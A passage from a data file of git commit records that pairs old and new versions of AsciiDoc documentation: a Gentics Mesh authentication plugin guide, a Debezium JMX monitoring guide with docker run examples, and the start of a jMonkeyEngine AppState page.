Bense umursuyorum, kimin dinledi\u011fini.\"_ +\n\nhttps:\/\/vimeo.com\/246656385\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"fabfbd482ef9a7c0f7a6741bce8daeacee8ce3d0","subject":"Add auth flow information","message":"Add auth flow information\n","repos":"gentics\/mesh,gentics\/mesh,gentics\/mesh,gentics\/mesh","old_file":"doc\/src\/main\/docs\/plugin-types\/auth-service-plugin.asciidoc","new_file":"doc\/src\/main\/docs\/plugin-types\/auth-service-plugin.asciidoc","new_contents":"---\ntitle: Authentication Service Plugin API\n---\n\ninclude::content\/docs\/variables.adoc-include[]\n\n== Intro\n\nThe Authentication Service Plugin API can be used to create plugins which extend the authentication\/authorization functionality of Gentics Mesh.\n\nThose plugins are intended to work in conjunction with the link:{{< relref \"authentication.asciidoc\" >}}#_oauth2[OAuth2] integration. When the OAuth2 integration with the Keycloak Identity Provider is enabled, Gentics Mesh will automatically sync users provided by Keycloak with the users that are stored in Gentics Mesh.\n\nOnce a JWT has been obtained from Keycloak it can be used for Gentics Mesh requests. The token is validated and the user is synced. \n\nOften, however, it is also desired to sync permission-specific information from the identity provider. This is where most of the Authentication Service Plugin API comes into play. The API can be used to create plugins which map the information from the JWT to Gentics Mesh roles and groups.\n\nThis way any public claim information from the JWT can be used to dynamically update the user and to create roles and groups.\n\n== Flow\n\nA typical request which needs authentication passes through various handlers which try to authenticate it. The `MeshAuthChain` is currently responsible for passing the requests along these handlers.\n\n=== JWT handler\n\nThis handler tries to authenticate the request by validating the JWT against the Gentics Mesh keystore certificate. The identified user will be added to the request when this succeeds. In this case no other authentication handler in the chain is called.\n\nNOTE: Failed authentications at this stage will yield a `Could not authenticate token.` warning. This warning will be removed in future versions of Gentics Mesh. The next handler in the chain will be used if the JWT handler was unable to authenticate the user.\n\n=== OAuth handler\n\nThis handler will utilize the configured or provided public keys to validate the request.\nThe `AuthServicePlugin` API will be called when the request JWT could be validated with the provided public keys.\n\nFirst the `acceptToken` method gets called to check if any of the plugins rejects the request.\n\nNext the mapping process will be invoked. The token information will be inspected to check whether a mapping call is needed.\n\nThe `extractUsername` method gets called to identify and load the user.\nOnce the user has been loaded, the token can be mapped to Gentics Mesh elements.\n\nNOTE: The `jti` or `iat` of the JWT will be used to decide whether a fresh mapping call must be invoked. 
The JWT will only be passed to the mapping code if it has not yet been handled.\n\nFinally the `mapToken` method will be called for every `AuthServicePlugin`.\n\n=== Anonymous Auth Handler\n\nThis handler will only be utilized when no authentication information has been added to the request and when the anonymous authentication has been enabled. The handler will automatically assign the anonymous user to the request and accept it.\n\n== Setup\n\nThe `AuthServicePlugin` interface must be used for an authentication plugin. This interface provides various methods which will be invoked by Gentics Mesh during the authentication process.\n\n\n== Mapping JWT\n\n.AuthServicePlugin methods excerpt\n[options=\"header\"]\n|======\n| Method | Description\n| `AuthServicePlugin#mapToken()` | Use the token information to create a mapping result which will be used to sync the user, groups and roles.\n|======\n\nThe information from the returned `MappingResult` will be used to sync the elements in Gentics Mesh. Any of the fields in the result can be omitted.\n\nThe sync process is as follows:\n\n1. Update the user with `MappingResult#getUser` information or use the _default mapper_ if no user was specified.\n2. Create roles that are listed in `MappingResult#getRoles`.\n3. Create groups that are listed in `MappingResult#getGroups`.\n4. Assign the user to the groups of the `MappingResult#getGroups` list.\n5. Link roles that are listed within `MappingResult#getGroups` entries to the groups (via `GroupResponse#getRoles`).\n6. Iterate over all roles of the mapped groups and invoke `MappingResult#getRoleFilter` to check whether the role should be unlinked from the group. You can use this to ensure that only specific roles are linked to the groups.\n7. Link roles that are listed within `MappingResult#getRoles` entries to the groups (via `GroupResponse#getGroups`).\n8. Iterate over all groups of the user and invoke `MappingResult#getGroupFilter` to check whether the user should be removed from the group. You can use this to ensure that the user is only part of specific groups.\n\nNOTE: A default mapper which maps _firstname_, _lastname_ and _email address_ will be used for the user information if you do not set the user field in the `MappingResult` object.\n\nNOTE: The synchronization process will only be invoked if the access token changes. Remember that you need to issue a new access token if you change the mapping in Keycloak. The old token may still contain the old information.\n\nWARNING: It is important to note that the mapper API cannot be used to *delete* users, roles or groups.\n\n== Utils\n\nThe `AuthServicePluginUtils` class provides additional utility functions that can be used in your plugin implementation. 
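\n\nFor example, a `mapToken` implementation which places the user in a group derived from a token claim could look roughly like the following sketch. Note that this is only a sketch: the shown signatures and package names are simplified assumptions, and the `department` claim as well as the derived group name are hypothetical - consult the `AuthServicePlugin` Javadoc and the plugin development guide for the exact API.\n\n[source,java]\n----\nimport java.util.Arrays;\n\nimport com.gentics.mesh.core.rest.group.GroupResponse;\n\nimport io.vertx.core.http.HttpServerRequest;\nimport io.vertx.core.json.JsonObject;\n\n\/\/ AbstractPlugin, AuthServicePlugin, MappingResult and AuthServicePluginUtils come from the\n\/\/ Gentics Mesh plugin API; their exact package names and signatures are omitted\/assumed here.\npublic class DepartmentMappingPlugin extends AbstractPlugin implements AuthServicePlugin {\n\n    public DepartmentMappingPlugin(PluginWrapper wrapper, PluginEnvironment env) {\n        super(wrapper, env);\n    }\n\n    @Override\n    public MappingResult mapToken(HttpServerRequest req, String userUuid, JsonObject token) {\n        MappingResult result = new MappingResult();\n\n        \/\/ Hypothetical public claim: place the user in a group named after the department\n        GroupResponse group = new GroupResponse();\n        group.setName(token.getString(\"department\"));\n        result.setGroups(Arrays.asList(group));\n\n        \/\/ Drop user\/group assignments which are not managed by this plugin\n        result.setGroupFilter(AuthServicePluginUtils.createGroupFilter(result.getGroups()));\n        return result;\n    }\n}\n----\n\n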
The `AuthServicePluginUtils#createRoleFilter()` and `AuthServicePluginUtils#createGroupFilter()` methods can be used to create filters which will only keep role\/group, user\/group assignments that have been specified in the given lists.\n\nThis is useful if you want to ensure that users only belong in the groups that are managed by your identity provider\/auth plugin.\n\n== Examples\n\n* link:https:\/\/github.com\/gentics\/mesh-plugin-examples\/tree\/master\/authentication-plugin[Authentication Service Plugin Example]","old_contents":"---\ntitle: Authentication Service Plugin API\n---\n\ninclude::content\/docs\/variables.adoc-include[]\n\n== Intro\n\nAuthentication Service Plugin API can be used to create plugins which can extend the authentication\/authorization functionality of Gentics Mesh.\n\nThose plugins are intended to work in conjunction with the link:{{< relref \"authentication.asciidoc\" >}}#_oauth2[OAuth2] interation. When the OAuth2 integration with the Keycloak Identity Provider is enabled Gentics Mesh will automatically sync users provided by Keycloak with the users that are stored in Gentics Mesh.\n\n\nOnce a JWT has been obtained by keycloak it can be used for Gentics Mesh requests. The token is validated and the user is sycned. \n\nOften it is however also desired to sync permission specific information from identity provider. This is where most of the Authentication Service Plugin API comes into play. The API can be used to create plugins which map the information from the JWT to Gentics Mesh roles and groups.\n\nThis way any public claim information from the JWT can be used to dynamically update the user, create roles and groups.\n\n== Setup\n\nThe `AuthServicePlugin` interface must be used for an authentication plugin. This interface provides various methods which will be invoked by Gentics Mesh during the authentication process.\n\n\n== Mapping JWT\n\n.AuthServicePlugin methods excerpt\n[options=\"header\"]\n|======\n| Method | Description\n| `AuthServicePlugin#mapToken()` | Use the token information to create a mapping result which will be used to sync user, groups, roles.\n|======\n\nThe information from the returned `MappingResult` will be used to sync the elements in Gentics Mesh. Any of the fields in the result can be omitted.\n\nSync process is as follows:\n\n1. Update user with `MappingResult#getUser` information or use _default mapper_ if no user was specified.\n2. Create roles that are listed in `MappingResult#getRoles`.\n3. Create groups that are listed in `MappingResult#getGroups`.\n4. Assign user to groups of `MappingResult#getGroups` list.\n5. Link roles that are listed within `MappingResult#getGroups` entries to the groups (via `GroupResponse#getRoles`).\n6. Iterate over all roles of the mapped groups and invoke `MappingResult#getRoleFilter` to check whether the role should be unlinked from the group. You can use this to ensure that only specific roles are links to the groups.\n7. Link roles that are listed within `MappingResult#getRoles` entries to the groups (via `GroupResponse#getGroups`).\n8. Iterate over all groups of the user and invoke `MappingResult#getGroupFilter` to check whether the user should be removed from the group. 
You can use this to ensure that the use is only part of specific groups.\n\nNOTE: A default mapper which maps _firstname_, _lastname_, _email address_ will be used for user information if you do not set the user field in the `MappingResult` object.\n\nNOTE: The synchronization process will only be invoked if the access token changes. Remember that you need to issue a new access token if you change the mapping in keycloak. The old token may still contain the old information.\n\nWARNING: It is important to note that the mapper API can not be used to *delete* users, roles or groups.\n\n== Utils\n\nThe `AuthServicePluginUtils` provides additional utility functions that can be used in your plugin implementation. The `AuthServicePluginUtils#createRoleFilter()` and `AuthServicePluginUtils#createGroupFilter()` methods can be used to create filters which will only keep role\/group, user\/group assignments that have been specified in the given lists.\n\nThis is useful if you want to ensure that users only belong in the groups that are managed by your identity provider\/auth plugin.\n\n== Examples\n\n* link:https:\/\/github.com\/gentics\/mesh-plugin-examples\/tree\/master\/authentication-plugin[Authentication Service Plugin Example]","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"eacc624001f55dbbe70bf987884c26a3e3c3945c","subject":"Adding section on Prometheus\/Grafana to monitoring docs","message":"Adding section on Prometheus\/Grafana to monitoring docs","repos":"debezium\/debezium,jpechane\/debezium,debezium\/debezium,debezium\/debezium,jpechane\/debezium,debezium\/debezium,jpechane\/debezium,jpechane\/debezium","old_file":"documentation\/modules\/ROOT\/pages\/operations\/monitoring.adoc","new_file":"documentation\/modules\/ROOT\/pages\/operations\/monitoring.adoc","new_contents":"= Monitoring Debezium\ninclude::..\/_attributes.adoc[]\n:linkattrs:\n:icons: font\n:toc:\n:toc-placement: macro\n\ntoc::[]\n\nDebezium uses Kafka and Zookeeper, and all of these support monitoring via JMX. In fact, there are a lot of https:\/\/zookeeper.apache.org\/doc\/r3.1.2\/zookeeperJMX.html[Zookeeper metrics] and even more http:\/\/docs.confluent.io\/3.0.0\/kafka\/monitoring.html[Kafka metrics] available. But how JMX is enabled in these services depends on whether you're running them in Docker containers or using the standard installations.\n\n[NOTE]\n====\nIf you are running multiple services on the same machine, be sure to use distinct JMX ports for each service.\n====\n\n\n== Local installations\n\nJMX can be enabled in Zookeeper, Kafka, and Kafka Connect using their standard installations and environment variables when running the startup commands.\n\n=== Local Zookeeper\n\nZookeeper has built-in support for JMX. When running Zookeeper using a local installation, the `zkServer.sh` script recognizes the following environment variables:\n\n[cols=\"35%a,10%a,55%a\",options=\"header,footer\",role=\"table table-bordered table-striped\"]\n|=======================\n|Environment Variable\n|Default\n|Description\n\n|`JMXPORT`\n|\n|Enables JMX and specifies the port number that will be used for JMX. The value is used to specify the JVM parameter `-Dcom.sun.management.jmxremote.port=$JMXPORT`.\n\n|`JMXAUTH`\n|`false`\n|Whether JMX clients must use password authentication when connecting. Must be either `true` or `false`. The value is used to specify the JVM parameter `-Dcom.sun.management.jmxremote.authenticate=$JMXAUTH`.\n\n|`JMXSSL`\n|`false`\n|Whether JMX clients connect using SSL\/TLS. 
Must be either `true` or `false`. The value is used to specify the JVM parameter `-Dcom.sun.management.jmxremote.ssl=$JMXSSL`.\n\n|`JMXLOG4J`\n|`true`\n|Whether the Log4J JMX MBeans should be disabled. Must be either `true` or `false`. The value is used to specify the JVM parameter `-Dzookeeper.jmx.log4j.disable=$JMXLOG4J`.\n|=======================\n\n=== Local Kafka\n\nWhen running Kafka using a local installation, the `kafka-server-start.sh` script recognizes the following environment variables:\n\n\n[cols=\"35%a,10%a,55%a\",options=\"header,footer\",role=\"table table-bordered table-striped\"]\n|=======================\n|Environment Variable\n|Default\n|Description\n\n|`JMX_PORT`\n|\n|Enables JMX and specifies the port number that will be used for JMX. The value is used to specify the JVM parameter `-Dcom.sun.management.jmxremote.port=$JMX_PORT`.\n\n|`KAFKA_JMX_OPTS`\n|`-Dcom.sun.management.jmxremote -Dcom.sun.management.jmxremote.authenticate=false -Dcom.sun.management.jmxremote.ssl=false `\n|JMX options, passed directly to the JVM during startup.\n|=======================\n\n\n=== Local Kafka Connect\n\nWhen running Kafka Connect using a local installation, the `connect-distributed.sh` script recognizes the following environment variables:\n\n\n[cols=\"35%a,10%a,55%a\",options=\"header,footer\",role=\"table table-bordered table-striped\"]\n|=======================\n|Environment Variable\n|Default\n|Description\n\n|`JMX_PORT`\n|\n|Enables JMX and specifies the port number that will be used for JMX. The value is used to specify the JVM parameter `-Dcom.sun.management.jmxremote.port=$JMX_PORT`.\n\n|`KAFKA_JMX_OPTS`\n|`-Dcom.sun.management.jmxremote -Dcom.sun.management.jmxremote.authenticate=false -Dcom.sun.management.jmxremote.ssl=false `\n|JMX options, passed directly to the JVM during startup.\n|=======================\n\n\n== Using Docker\n\nEnabling JMX for a JVM running in a Docker container requires several additional options not normally needed when running on a local machine. This is because the JVM requires the hostname to which it will advertise itself to JMX clients. Because of this, Debezium's Docker images for Zookeeper, Kafka, and Kafka Connect use several environment variables to enable and configure JMX. Most of the environment variables are the same for all of the images, but there are some minor differences.\n\n=== Zookeeper in Docker\n\nThe `debezium\/zookeeper` image recognizes the following JMX-related environment variables:\n\n[cols=\"35%a,10%a,55%a\",options=\"header,footer\",role=\"table table-bordered table-striped\"]\n|=======================\n|Environment Variable\n|Default\n|Description\n\n|`JMXPORT`\n|\n|Required. The port number that will be used for JMX. The value is used to specify the JVM parameters `-Dcom.sun.management.jmxremote.port=$JMXPORT` and `-Dcom.sun.management.jmxremote.rmi.port=$JMXPORT`.\n\n|`JMXHOST`\n|\n|Required. The IP address or resolvable hostname of the Docker host, which JMX uses to construct a URL sent to the JMX client. A value of `localhost` or `127.0.0.1` will not work. The value is used to specify the JVM parameter `-Djava.rmi.server.hostname=$JMXHOST`.\n\n|`JMXAUTH`\n|`false`\n|Whether JMX clients must use password authentication when connecting. Must be either `true` or `false`. The value is used to specify the JVM parameter `-Dcom.sun.management.jmxremote.authenticate=$JMXAUTH`.\n\n|`JMXSSL`\n|`false`\n|Whether JMX clients connect using SSL\/TLS. Must be either `true` or `false`. 
The value is used to specify the JVM parameter `-Dcom.sun.management.jmxremote.ssl=$JMXSSL`.\n\n|`JMXLOG4J`\n|`true`\n|Whether the Log4J JMX MBeans should be disabled. Must be either `true` or `false`. The value is used to specify the JVM parameter `-Dzookeeper.jmx.log4j.disable=$JMXLOG4J`.\n|=======================\n\nThe following example Docker command starts a container using the `debezium\/zookeeper` image with values for the `JMXPORT` and `JMXHOST` environment variables, and maps the Docker host's port 9010 to the container's JMX port:\n\n```\ndocker run -it --rm --name zookeeper -p 2181:2181 -p 2888:2888 -p 3888:3888 -p 9010:9010 -e JMXPORT=9010 -e JMXHOST=10.0.1.10 debezium\/zookeeper:latest\n```\n\n=== Kafka in Docker\n\nThe `debezium\/kafka` image recognizes the following JMX-related environment variables:\n\n[cols=\"35%a,10%a,55%a\",options=\"header,footer\",role=\"table table-bordered table-striped\"]\n|=======================\n|Environment Variable\n|Default\n|Description\n\n|`JMXPORT`\n|\n|Required. The port number that will be used for JMX. The value is used to specify the JVM parameters `-Dcom.sun.management.jmxremote.port=$JMXPORT` and `-Dcom.sun.management.jmxremote.rmi.port=$JMXPORT`.\n\n|`JMXHOST`\n|\n|Required. The IP address or resolvable hostname of the Docker host, which JMX uses to construct a URL sent to the JMX client. A value of `localhost` or `127.0.0.1` will not work. The value is used to specify the JVM parameter `-Djava.rmi.server.hostname=$JMXHOST`.\n\n|`JMXAUTH`\n|`false`\n|Whether JMX clients must use password authentication when connecting. Must be either `true` or `false`. The value is used to specify the JVM parameter `-Dcom.sun.management.jmxremote.authenticate=$JMXAUTH`.\n\n|`JMXSSL`\n|`false`\n|Whether JMX clients connect using SSL\/TLS. Must be either `true` or `false`. The value is used to specify the JVM parameter `-Dcom.sun.management.jmxremote.ssl=$JMXSSL`.\n|=======================\n\n\nThe following example Docker command starts a container using the `debezium\/kafka` image with values for the `JMXPORT` and `JMXHOST` environment variables, and maps the Docker host's port 9011 to the container's JMX port:\n\n```\ndocker run -it --rm --name kafka -p 9092:9092 -p 9011:9011 -e JMXPORT=9011 -e JMXHOST=10.0.1.10 --link zookeeper:zookeeper debezium\/kafka:latest\n```\n\n=== Kafka Connect in Docker\n\nThe `debezium\/connect` image recognizes the following JMX-related environment variables:\n\n[cols=\"35%a,10%a,55%a\",options=\"header,footer\",role=\"table table-bordered table-striped\"]\n|=======================\n|Environment Variable\n|Default\n|Description\n\n|`JMXPORT`\n|\n|Required. The port number that will be used for JMX. The value is used to specify the JVM parameters `-Dcom.sun.management.jmxremote.port=$JMXPORT` and `-Dcom.sun.management.jmxremote.rmi.port=$JMXPORT`.\n\n|`JMXHOST`\n|\n|Required. The IP address or resolvable hostname of the Docker host, which JMX uses to construct a URL sent to the JMX client. A value of `localhost` or `127.0.0.1` will not work. The value is used to specify the JVM parameter `-Djava.rmi.server.hostname=$JMXHOST`.\n\n|`JMXAUTH`\n|`false`\n|Whether JMX clients must use password authentication when connecting. Must be either `true` or `false`. The value is used to specify the JVM parameter `-Dcom.sun.management.jmxremote.authenticate=$JMXAUTH`.\n\n|`JMXSSL`\n|`false`\n|Whether JMX clients connect using SSL\/TLS. Must be either `true` or `false`. 
The value is used to specify the JVM parameter `-Dcom.sun.management.jmxremote.ssl=$JMXSSL`.\n|=======================\n\nThe following example Docker command starts a container using the `debezium\/connect` image with values for the `JMXPORT` and `JMXHOST` environment variables, defined using Docker's standard `-e` parameter, and maps the Docker host's port 9012 to the container's JMX port:\n\n```\ndocker run -it --rm --name connect -p 8083:8083 -p 9012:9012 -e JMXPORT=9012 -e JMXHOST=10.0.1.10 -e GROUP_ID=1 -e CONFIG_STORAGE_TOPIC=my_connect_configs -e OFFSET_STORAGE_TOPIC=my_connect_offsets --link zookeeper:zookeeper --link kafka:kafka --link mysql:mysql debezium\/connect:latest\n```\n\n== Prometheus and Grafana\n\nThe metrics exposed by Debezium and Apache Kafka are often exported and displayed via https:\/\/prometheus.io\/[Prometheus] and https:\/\/grafana.com\/[Grafana].\nYou can find an example for the required configuration and example dashboards for different connectors in the https:\/\/github.com\/debezium\/debezium-examples\/tree\/master\/monitoring[Debezium examples repository].\nNote that these dashboards are not part of Debezium itself and are maintained on a best-effort basis.\n\n","old_contents":"= Monitoring Debezium\ninclude::..\/_attributes.adoc[]\n:linkattrs:\n:icons: font\n:toc:\n:toc-placement: macro\n\ntoc::[]\n\nDebezium uses Kafka and Zookeeper, and all of these support monitoring via JMX. In fact, there are a lot of https:\/\/zookeeper.apache.org\/doc\/r3.1.2\/zookeeperJMX.html[Zookeeper metrics] and even more http:\/\/docs.confluent.io\/3.0.0\/kafka\/monitoring.html[Kafka metrics] available. But how JMX is enabled in these services depends on whether you're running them in Docker containers or using the standard installations.\n\n[NOTE]\n====\nIf you are running multiple services on the same machine, be sure to use distinct JMX ports for each service.\n====\n\n\n== Local installations\n\nJMX can be enabled in Zookeeper, Kafka, and Kafka Connect using their standard installations and environment variables when running the startup commands.\n\n=== Local Zookeeper\n\nZookeeper has built-in support for JMX. When running Zookeeper using a local installation, the `zkServer.sh` script recognizes the following environment variables:\n\n[cols=\"35%a,10%a,55%a\",options=\"header,footer\",role=\"table table-bordered table-striped\"]\n|=======================\n|Environment Variable\n|Default\n|Description\n\n|`JMXPORT`\n|\n|Enables JMX and specifies the port number that will be used for JMX. The value is used to specify the JVM parameter `-Dcom.sun.management.jmxremote.port=$JMXPORT`.\n\n|`JMXAUTH`\n|`false`\n|Whether JMX clients must use password authentication when connecting. Must be either `true` or `false`. The value is used to specify the JVM parameter `-Dcom.sun.management.jmxremote.authenticate=$JMXAUTH`.\n\n|`JMXSSL`\n|`false`\n|Whether JMX clients connect using SSL\/TLS. Must be either `true` or `false`. 
The value is used to specify the JVM parameter `-Dzookeeper.jmx.log4j.disable=$JMXLOG4J`.\n|=======================\n\n=== Local Kafka\n\nWhen running Kafka using a local installation, the `kafka-server-start.sh` script recognizes the following environment variables:\n\n\n[cols=\"35%a,10%a,55%a\",options=\"header,footer\",role=\"table table-bordered table-striped\"]\n|=======================\n|Environment Variable\n|Default\n|Description\n\n|`JMX_PORT`\n|\n|Enables JMX and specifies the port number that will be used for JMX. The value is used to specify the JVM parameter `-Dcom.sun.management.jmxremote.port=$JMX_PORT`.\n\n|`KAFKA_JMX_OPTS`\n|`-Dcom.sun.management.jmxremote -Dcom.sun.management.jmxremote.authenticate=false -Dcom.sun.management.jmxremote.ssl=false `\n|JMX options, passed directly to the JVM during startup.\n|=======================\n\n\n=== Local Kafka Connect\n\nWhen running Kafka using a local installation, the `connect-distributed.sh` script recognizes the following environment variables:\n\n\n[cols=\"35%a,10%a,55%a\",options=\"header,footer\",role=\"table table-bordered table-striped\"]\n|=======================\n|Environment Variable\n|Default\n|Description\n\n|`JMX_PORT`\n|\n|Enables JMX and specifies the port number that will be used for JMX. The value is used to specify the JVM parameter `-Dcom.sun.management.jmxremote.port=$JMX_PORT`.\n\n|`KAFKA_JMX_OPTS`\n|`-Dcom.sun.management.jmxremote -Dcom.sun.management.jmxremote.authenticate=false -Dcom.sun.management.jmxremote.ssl=false `\n|JMX options, passed directly to the JVM during startup.\n|=======================\n\n\n== Using Docker\n\nEnable JMX for a JVM running in a Docker container requires several additional options not normally needed when running on a local machine. This is because the JVM requires the hostname to which it will advertise itself to JMX clients. Because of this, Debezium's Docker images for Zookeeper, Kafka, and Kafka Connect use several environment variables to enable and configure JMX. Most of the environment variables are the same for all of the images, but there are some minor differences.\n\n=== Zookeeper in Docker\n\nThe `debezium\/zookeeper` image recognizes the following JMX-related environment variables:\n\n[cols=\"35%a,10%a,55%a\",options=\"header,footer\",role=\"table table-bordered table-striped\"]\n|=======================\n|Environment Variable\n|Default\n|Description\n\n|`JMXPORT`\n|\n|Required. The port number that will be used for JMX. The value is used to specify the JVM parameters `-Dcom.sun.management.jmxremote.port=$JMXPORT` and `-Dcom.sun.management.jmxremote.rmi.port=$JMXPORT`.\n\n|`JMXHOST`\n|\n|Required. The IP address or resolvable hostname of the Docker host, which JMX uses to construct a URL sent to the JMX client. A value of `localhost` or `127.0.0.1` will not work. The value is used to specify the JVM parameter `-Djava.rmi.server.hostname=$JMXHOST`.\n\n|`JMXAUTH`\n|`false`\n|Whether JMX clients must use password authentication when connecting. Must be either `true` or `false`. The value is used to specify the JVM parameter `-Dcom.sun.management.jmxremote.authenticate=$JMXAUTH`.\n\n|`JMXSSL`\n|`false`\n|Whether JMX clients connect using SSL\/TLS. Must be either `true` or `false`. The value is used to specify the JVM parameter `-Dcom.sun.management.jmxremote.ssl=$JMXSSL`.\n\n|`JMXLOG4J`\n|`true`\n|Whether the Log4J JMX MBeans should be disabled. Must be either `true` or `false`. 
The value is used to specify the JVM parameter `-Dzookeeper.jmx.log4j.disable=$JMXLOG4J`.\n|=======================\n\nThe following example Docker command start a container using the `debezium\/zookeeper` image with values for the `JMXPORT` and `JMXHOST` environment variables, and maps the Docker host's port 9010 to the container's JMX port:\n\n```\ndocker run -it --rm --name zookeeper -p 2181:2181 -p 2888:2888 -p 3888:3888 -p 9010:9010 -e JMXPORT=9010 -e JMXHOST=10.0.1.10 debezium\/zookeeper:latest\n```\n\n=== Kafka in Docker\n\nThe `debezium\/kafka` image recognizes the following JMX-related environment variables:\n\n[cols=\"35%a,10%a,55%a\",options=\"header,footer\",role=\"table table-bordered table-striped\"]\n|=======================\n|Environment Variable\n|Default\n|Description\n\n|`JMXPORT`\n|\n|Required. The port number that will be used for JMX. The value is used to specify the JVM parameters `-Dcom.sun.management.jmxremote.port=$JMXPORT` and `-Dcom.sun.management.jmxremote.rmi.port=$JMXPORT`.\n\n|`JMXHOST`\n|\n|Required. The IP address or resolvable hostname of the Docker host, which JMX uses to construct a URL sent to the JMX client. A value of `localhost` or `127.0.0.1` will not work. The value is used to specify the JVM parameter `-Djava.rmi.server.hostname=$JMXHOST`.\n\n|`JMXAUTH`\n|`false`\n|Whether JMX clients must use password authentication when connecting. Must be either `true` or `false`. The value is used to specify the JVM parameter `-Dcom.sun.management.jmxremote.authenticate=$JMXAUTH`.\n\n|`JMXSSL`\n|`false`\n|Whether JMX clients connect using SSL\/TLS. Must be either `true` or `false`. The value is used to specify the JVM parameter `-Dcom.sun.management.jmxremote.ssl=$JMXSSL`.\n|=======================\n\n\nThe following example Docker command start a container using the `debezium\/kafka` image with values for the `JMXPORT` and `HOST_NAME` environment variables, and maps the Docker host's port 9011 to the container's JMX port:\n\n```\ndocker run -it --rm --name kafka -p 9092:9092 -p 9011:9011 -e JMXPORT=9011 -e JMXHOST=10.0.1.10 --link zookeeper:zookeeper debezium\/kafka:latest\n```\n\n== Kafka Connect in Docker\n\nThe `debezium\/connect` image recognizes the following JMX-related environment variables:\n\n[cols=\"35%a,10%a,55%a\",options=\"header,footer\",role=\"table table-bordered table-striped\"]\n|=======================\n|Environment Variable\n|Default\n|Description\n\n|`JMXPORT`\n|\n|Required. The port number that will be used for JMX. The value is used to specify the JVM parameters `-Dcom.sun.management.jmxremote.port=$JMXPORT` and `-Dcom.sun.management.jmxremote.rmi.port=$JMXPORT`.\n\n|`JMXHOST`\n|\n|Required. The IP address or resolvable hostname of the Docker host, which JMX uses to construct a URL sent to the JMX client. A value of `localhost` or `127.0.0.1` will not work. The value is used to specify the JVM parameter `-Djava.rmi.server.hostname=$JMXHOST`.\n\n|`JMXAUTH`\n|`false`\n|Whether JMX clients must use password authentication when connecting. Must be either `true` or `false`. The value is used to specify the JVM parameter `-Dcom.sun.management.jmxremote.authenticate=$JMXAUTH`.\n\n|`JMXSSL`\n|`false`\n|Whether JMX clients connect using SSL\/TLS. Must be either `true` or `false`. 
The value is used to specify the JVM parameter `-Dcom.sun.management.jmxremote.ssl=$JMXSSL`.\n|=======================\n\nThe following example Docker command starts a container using the `debezium\/connect` image, defines the `JMXPORT` and `JMXHOST` environment variables using Docker's standard `-e` parameter, and maps the Docker host's port 9012 to the container's JMX port:\n\n```\ndocker run -it --rm --name connect -p 8083:8083 -p 9012:9012 -e JMXPORT=9012 -e JMXHOST=10.0.1.10 -e GROUP_ID=1 -e CONFIG_STORAGE_TOPIC=my_connect_configs -e OFFSET_STORAGE_TOPIC=my_connect_offsets --link zookeeper:zookeeper --link kafka:kafka --link mysql:mysql debezium\/connect:latest\n```\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6ff0e7839ab2d05874b8fa38b49b6834e1cfa692","subject":"attribute test.","message":"attribute test.\n","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"src\/docs\/asciidoc\/jme3\/advanced\/application_states.adoc","new_file":"src\/docs\/asciidoc\/jme3\/advanced\/application_states.adoc","new_contents":"= Application States\n:author:\n:revnumber:\n:revdate: 2016\/03\/17 20:48\n:relfileprefix: ..\/..\/\n:imagesdir: ..\/..\n:experimental:\nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n\n\nThe `com.jme3.app.state.AppState` class is a customizable jME3 interface that allows you to control the global game logic, the overall game mechanics. (To control the behaviour of a Spatial, see <<jme3\/advanced\/custom_controls#,Custom Controls>> instead. Controls and AppStates can be used together.)\n\n\n== Overview\n\n\n=== Use Case Examples\n\nThere are situations during your game development where you think:\n\n* Mouse and key inputs are handled differently in-game versus in the main menu. Can I group a set of input handler settings, and activate and deactivate them all in one step?\n* I have the in-game scene, and a character editor, and a Captain's Quarters screen. Can I group a set of nodes and behaviours, and swap them in and out in one step?\n* When I pause the game, I want the character's \"`idle`\" animation to continue, but all other loops and game events should stop. How do I define what happens when the game is paused\/unpaused?\n* I have a conditional block that takes up a lot of space in my simpleUpdate() loop. Can I wrap up this block of code, and switch it on and off in one step?\n* Can I package everything that belongs in-game, and everything that belongs to the menu screen, and switch between these two \"`big`\" states in one step?\n\nYou can! This is what AppStates are there for. An AppState class is a subset of (or an extension to) your application. Every AppState class has access to all fields in your main application (AssetManager, ViewPort, StateManager, InputManager, RootNode, GuiNode, etc) and hooks into the main update loop; a minimal usage sketch follows the list below. An AppState can contain:\n\n* a subset of class fields, functions, methods (game state data and accessors),\n* a subset of +++<abbr title=\"Graphical User Interface\">GUI<\/abbr>+++ elements and their listeners,\n* a subset of input handlers and mappings,\n* a subset of nodes that you load and attach to the rootNode,\n* a subset of conditional actions that you branch to in the simpleUpdate() loop,\n* a subset of other AppStates and Controls\n* \u2026 or combinations thereof.\n\n
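For example, here is a minimal sketch (assuming a hypothetical custom `InGameState` class written along the lines of the templates later on this page) of how the main application can swap a whole set of game logic in and out with a single call:\n\n[source,java]\n----\npublic class MyGame extends SimpleApplication {\n\n private final InGameState inGameState = new InGameState(); \/\/ hypothetical custom AppState\n\n @Override\n public void simpleInitApp() {\n stateManager.attach(inGameState); \/\/ initialize() is called on the next render pass\n }\n\n public void backToMainMenu() {\n stateManager.detach(inGameState); \/\/ cleanup() is called on the next render pass\n }\n}\n----\n\n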
